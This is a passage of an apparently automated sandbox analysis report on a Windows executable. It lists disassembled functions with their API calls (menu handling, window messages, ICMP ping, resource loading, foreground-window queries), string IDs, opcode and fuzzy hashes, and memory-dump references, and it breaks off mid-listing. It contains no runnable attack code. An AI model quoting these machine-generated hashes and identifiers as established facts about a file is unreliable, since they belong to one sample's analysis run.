                                                                                                                                                                            • Opcode ID: 33ef2045f5895504ed83ad1c87ca5cb1f04749205f715704f8f5b194820e8c7e
                                                                                                                                                                            • Instruction ID: 38cb4abc1a93e83a5f991731555b417128dbba5b0f7951f90d11fa09463a9b99
                                                                                                                                                                            • Opcode Fuzzy Hash: 33ef2045f5895504ed83ad1c87ca5cb1f04749205f715704f8f5b194820e8c7e
                                                                                                                                                                            • Instruction Fuzzy Hash: 9831AD31104194BBDF119FB5DC48FEB3B69FF09325F100226FA55A61A1C739E815DBA8
                                                                                                                                                                            Function 00487040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 0048707B
                                                                                                                                                                              • Part of subcall function 00488D68: __getptd_noexit.LIBCMT ref: 00488D68
                                                                                                                                                                            • __gmtime64_s.LIBCMT ref: 00487114
                                                                                                                                                                            • __gmtime64_s.LIBCMT ref: 0048714A
                                                                                                                                                                            • __gmtime64_s.LIBCMT ref: 00487167
                                                                                                                                                                            • __allrem.LIBCMT ref: 004871BD
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004871D9
                                                                                                                                                                            • __allrem.LIBCMT ref: 004871F0
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0048720E
                                                                                                                                                                            • __allrem.LIBCMT ref: 00487225
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00487243
                                                                                                                                                                            • __invoke_watson.LIBCMT ref: 004872B4
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 384356119-0
                                                                                                                                                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                                                                            • Instruction ID: 3358d3726e2fdc15e74d74c9804e4715243b32050788f976736b33089b1a3a6d
                                                                                                                                                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F711571A04716ABDB14BE79CC91B5FB7A8AF01328F24463FF414E6381E778D9408798
                                                                                                                                                                            Function 004C2A16 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004C2A31
                                                                                                                                                                            • GetMenuItemInfoW.USER32(00526890,000000FF,00000000,00000030), ref: 004C2A92
                                                                                                                                                                            • SetMenuItemInfoW.USER32(00526890,00000004,00000000,00000030), ref: 004C2AC8
                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 004C2ADA
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 004C2B1E
                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 004C2B3A
                                                                                                                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 004C2B64
                                                                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 004C2BA9
                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004C2BEF
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C2C03
                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C2C24
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4176008265-0
                                                                                                                                                                            • Opcode ID: cf5716a911369572014f46f548e82bc216cfd167bf3870d8bac97558f460cef2
                                                                                                                                                                            • Instruction ID: 6f523f80a6cb5a5541d34c42305e97e1ed05eb7c927c3dbac4962d1a4a11aae5
                                                                                                                                                                            • Opcode Fuzzy Hash: cf5716a911369572014f46f548e82bc216cfd167bf3870d8bac97558f460cef2
                                                                                                                                                                            • Instruction Fuzzy Hash: BA619378900249AFDB61CF54CA84FBF7BB8EB51304F14046EE84197252E7F9AD05DB25
                                                                                                                                                                            Function 004E7192 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004E7214
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004E7217
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004E723B
                                                                                                                                                                            • _memset.LIBCMT ref: 004E724C
                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004E725E
                                                                                                                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004E72D6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 830647256-0
                                                                                                                                                                            • Opcode ID: e5297fbb954d32fc2196cb22f4677fc9061719f3ffc0d526f5428656f50c3afe
                                                                                                                                                                            • Instruction ID: c768c4efa852ab4a00130e6360fa12c476ad94cdf61f0d5d2020da74916164f4
                                                                                                                                                                            • Opcode Fuzzy Hash: e5297fbb954d32fc2196cb22f4677fc9061719f3ffc0d526f5428656f50c3afe
                                                                                                                                                                            • Instruction Fuzzy Hash: 43616971900288AFDB20DFA5CC81EEE77F8EF09714F14016AFA14A73A1D774A946DB64
                                                                                                                                                                            Function 004B710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 004B7135
                                                                                                                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 004B718E
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004B71A0
                                                                                                                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004B71C0
                                                                                                                                                                            • VariantCopy.OLEAUT32(?,?), ref: 004B7213
                                                                                                                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004B7227
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004B723C
                                                                                                                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 004B7249
                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004B7252
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004B7264
                                                                                                                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004B726F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2706829360-0
                                                                                                                                                                            • Opcode ID: f6156cef03df45ed539698df79c2cd06e8c87cb9e407d0aba47ebaa5f9244692
                                                                                                                                                                            • Instruction ID: 97d84616652350c10fcc192799e21aa9821554217e77eb455380d3fc1a7b6cca
                                                                                                                                                                            • Opcode Fuzzy Hash: f6156cef03df45ed539698df79c2cd06e8c87cb9e407d0aba47ebaa5f9244692
                                                                                                                                                                            • Instruction Fuzzy Hash: BC414135A001199FCF04DFA9D884DEEBBB8EF58354F00807AF915AB261DB34A945CBA4
                                                                                                                                                                            Function 004D86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • CoInitialize.OLE32 ref: 004D8718
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004D8723
                                                                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,004F2BEC,?), ref: 004D8783
                                                                                                                                                                            • IIDFromString.OLE32(?,?), ref: 004D87F6
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004D8890
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004D88F1
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                            • API String ID: 834269672-1287834457
                                                                                                                                                                            • Opcode ID: 154a68ca251684703c98341d82de6d8a68a3e82386352013da2f7ec33f52db19
                                                                                                                                                                            • Instruction ID: ea5dd456d34e47fffbcafbd592b05e0cd928ae615f8db591a29b658f74c47830
                                                                                                                                                                            • Opcode Fuzzy Hash: 154a68ca251684703c98341d82de6d8a68a3e82386352013da2f7ec33f52db19
                                                                                                                                                                            • Instruction Fuzzy Hash: F8618E706083019FD710EF25C858A6BBBE8AF44714F14481FF9859B391DB78ED48CB9A
                                                                                                                                                                            Function 004D5A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 004D5AA6
                                                                                                                                                                            • inet_addr.WSOCK32(?), ref: 004D5AEB
                                                                                                                                                                            • gethostbyname.WSOCK32(?), ref: 004D5AF7
                                                                                                                                                                            • IcmpCreateFile.IPHLPAPI ref: 004D5B05
                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004D5B75
                                                                                                                                                                            • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004D5B8B
                                                                                                                                                                            • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004D5C00
                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 004D5C06
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                            • String ID: Ping
                                                                                                                                                                            • API String ID: 1028309954-2246546115
                                                                                                                                                                            • Opcode ID: 800c984c9589f3c0a8cc8d6d90efc7e2da8df181788e58b56d77426cccb5aacd
                                                                                                                                                                            • Instruction ID: a1e7983883bc80f984dab0811215a475c7b20a04282ba9fecc179237ab7184de
                                                                                                                                                                            • Opcode Fuzzy Hash: 800c984c9589f3c0a8cc8d6d90efc7e2da8df181788e58b56d77426cccb5aacd
                                                                                                                                                                            • Instruction Fuzzy Hash: 02519C316047009FDB20AF25CC95B2AB7E4EF48710F04892BF956DB3A1DB78EC448B0A
                                                                                                                                                                            Function 004CB72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 004CB73B
                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004CB7B1
                                                                                                                                                                            • GetLastError.KERNEL32 ref: 004CB7BB
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 004CB828
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                            • API String ID: 4194297153-14809454
                                                                                                                                                                            • Opcode ID: 3f4ab331fb3d5457227753aed9b7c1d13abdc0e8503dc110a91c938f138ff7eb
                                                                                                                                                                            • Instruction ID: acfa057b2d60fd5556d2ed82b77b685302114c65d3c133b22179207fc2ffcddf
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f4ab331fb3d5457227753aed9b7c1d13abdc0e8503dc110a91c938f138ff7eb
                                                                                                                                                                            • Instruction Fuzzy Hash: 4C31A639A012049FDB41EF65C886FAEBBB4FF44704F14402FE80197291E7799D46C795
                                                                                                                                                                            Function 004B9471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004B94F6
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 004B9501
                                                                                                                                                                            • GetParent.USER32 ref: 004B951D
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004B9520
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 004B9529
                                                                                                                                                                            • GetParent.USER32(?), ref: 004B9545
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 004B9548
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                                                                            • Opcode ID: 91676b3047c2976d96bb6a59b1f17f5f70f7c4ac6f445b39b0d41dd4f16d4ab3
                                                                                                                                                                            • Instruction ID: 8fa847d84389b9272c2330be083e0171a7e3e28a94c7ce81814c17c4360526b8
                                                                                                                                                                            • Opcode Fuzzy Hash: 91676b3047c2976d96bb6a59b1f17f5f70f7c4ac6f445b39b0d41dd4f16d4ab3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4F210670A00244BBCF05AB61CCC5EFEBB75EF45300F10412AF661972E2DB799919DB24
                                                                                                                                                                            Function 004B955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004BB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 004BB0E7
                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004B95DF
                                                                                                                                                                            • GetDlgCtrlID.USER32 ref: 004B95EA
                                                                                                                                                                            • GetParent.USER32 ref: 004B9606
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 004B9609
                                                                                                                                                                            • GetDlgCtrlID.USER32(?), ref: 004B9612
                                                                                                                                                                            • GetParent.USER32(?), ref: 004B962E
                                                                                                                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 004B9631
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                                                                            • API String ID: 1536045017-1403004172
                                                                                                                                                                            • Opcode ID: bd49c6473d3cfb96557ac352e98864bda792db89178d7942488a7f3d332a65ab
                                                                                                                                                                            • Instruction ID: 4228a12a0ee93e13546b38088c2057527baeeab43d619a99ed52879c764203d2
                                                                                                                                                                            • Opcode Fuzzy Hash: bd49c6473d3cfb96557ac352e98864bda792db89178d7942488a7f3d332a65ab
                                                                                                                                                                            • Instruction Fuzzy Hash: 6B210670A00244BBDF05AB71CCC5EFEBB74EF44300F10402AF511972A2DB79491ADA24
                                                                                                                                                                            Function 004B9645 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetParent.USER32 ref: 004B9651
                                                                                                                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 004B9666
                                                                                                                                                                            • _wcscmp.LIBCMT ref: 004B9678
                                                                                                                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004B96F3
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                            • API String ID: 1704125052-3381328864
                                                                                                                                                                            • Opcode ID: 730c6c0998edf8c26f187d1235748b7bb8b669922ce07f7a310e49840dcaced9
                                                                                                                                                                            • Instruction ID: 57c1b305b4da97ec79bc7955051e60edfbeac5851470de6f13da5429ce2e91e5
                                                                                                                                                                            • Opcode Fuzzy Hash: 730c6c0998edf8c26f187d1235748b7bb8b669922ce07f7a310e49840dcaced9
                                                                                                                                                                            • Instruction Fuzzy Hash: C9113A36248307BAFA012A35DC1BDEB7B9C9F01B24F20002BFA00A40D2FEA95D51466D
                                                                                                                                                                            Function 004C4189 Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004C419D
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004C41AA
                                                                                                                                                                              • Part of subcall function 004838D8: __woutput_l.LIBCMT ref: 00483931
                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 004C41D4
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004C41E0
                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 004C41ED
                                                                                                                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 004C420D
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 004C421F
                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 004C422E
                                                                                                                                                                            • LockResource.KERNEL32(?), ref: 004C423A
                                                                                                                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 004C429B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1433390588-0
                                                                                                                                                                            • Opcode ID: 8898ad80838c4ea3b97bdc49a1d4bb4d538b2ffdc43884af608a6c2c07f29271
                                                                                                                                                                            • Instruction ID: b60ac38a415b0c305798b4aa15d568b0a795bfb1a88a49de782a8ae49ae5bda0
                                                                                                                                                                            • Opcode Fuzzy Hash: 8898ad80838c4ea3b97bdc49a1d4bb4d538b2ffdc43884af608a6c2c07f29271
                                                                                                                                                                            • Instruction Fuzzy Hash: BB31E07560124AABCB109F60DD99EBF7BACEF48341F00447AF901D6141D738DA12CBA9
                                                                                                                                                                            Function 004C16DE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004C1700
                                                                                                                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,004C0778,?,00000001), ref: 004C1714
                                                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004C171B
